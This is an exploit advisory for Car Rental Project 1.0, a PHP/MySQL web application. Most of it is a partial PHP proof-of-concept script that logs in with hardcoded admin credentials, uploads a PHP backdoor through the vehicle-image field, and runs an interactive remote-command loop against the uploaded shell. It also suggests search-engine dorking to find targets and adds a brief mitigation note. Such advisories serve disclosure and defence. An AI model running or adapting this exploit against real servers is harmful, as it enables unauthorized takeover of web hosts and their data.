=============================================================================================================================================
| # Title     : Car Rental Project 1.0 php code injection Vulnerability                                                                      |
| # Author    : indoushka                                                                                                                    |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://phpgurukul.com/car-rental-project-php-mysql-free-download/                                                           |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine.
[+] This PHP code logs in to the admin panel and then uploads a PHP file through the vehicle-image form field (img1). The file is stored under admin/img/vehicleimages/, where the web server executes it, so the issue is an authenticated file upload that leads to code execution.
[+] Precondition : a valid admin login. The script posts a username and password before it uploads anything.
[+] Mitigation : accept only validated image types in the upload handler, store uploads outside the web root or in a directory where script execution is disabled, and change the admin password if the one shown below is still in use.
[+] save payload as poc.php
[+] usage : C:\www\test>php poc.php 127.0.0.1
[+] payload : (the start of the script is missing from this copy; the listing below begins partway through the login form data)

'admin', 'password' => 'Test@12345', 'login' => '' ]; // Initiating a cURL request for login curl_setopt($session, CURLOPT_URL, $post_auth_login); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($session, CURLOPT_COOKIEFILE, "cookie.txt"); // Store cookies in a file $login_response = curl_exec($session); // Get the HTTP response code $http_code = curl_getinfo($session, CURLINFO_HTTP_CODE); if ($http_code == 200) { echo "[+] Login HTTP response code: 200\n"; echo "[+] Successfully logged in\n"; } else { echo "[!] 
Failed to authenticate\n"; exit; } // Proxy settings (optional, for Burp) $proxies = [ "http" => "http://127.0.0.1:8080", "https" => "http://127.0.0.1:8080" ]; // Data for uploading the backdoor $backdoor_file = new CURLFile('1dccadfed7bcbb036c56a4afb97e906f.php', 'application/x-php', ''); $upload_data = [ 'img1' => $backdoor_file, 'update' => '' ]; // Attempt to upload the PHP shell curl_setopt($session, CURLOPT_URL, $shell_upload_url); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, $upload_data); $upload_response = curl_exec($session); if ($upload_response) { echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" . $bigstring; } else { echo "[!] Failed to upload backdoor\n"; exit; } // Command Execution Loop while (true) { echo "Command RCE >> "; $command = trim(fgets(STDIN)); $shell_location = "http://" . $rhosts . "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php?cmd=" . urlencode($command); // Execute the command curl_setopt($session, CURLOPT_URL, $shell_location); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($session); echo $response . "\n"; } // Close cURL session curl_close($session); } if ($argc < 2) { echo "Usage: php script.php [target_host]\n"; exit; } // Call the login function with the provided host login($argv[1]); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================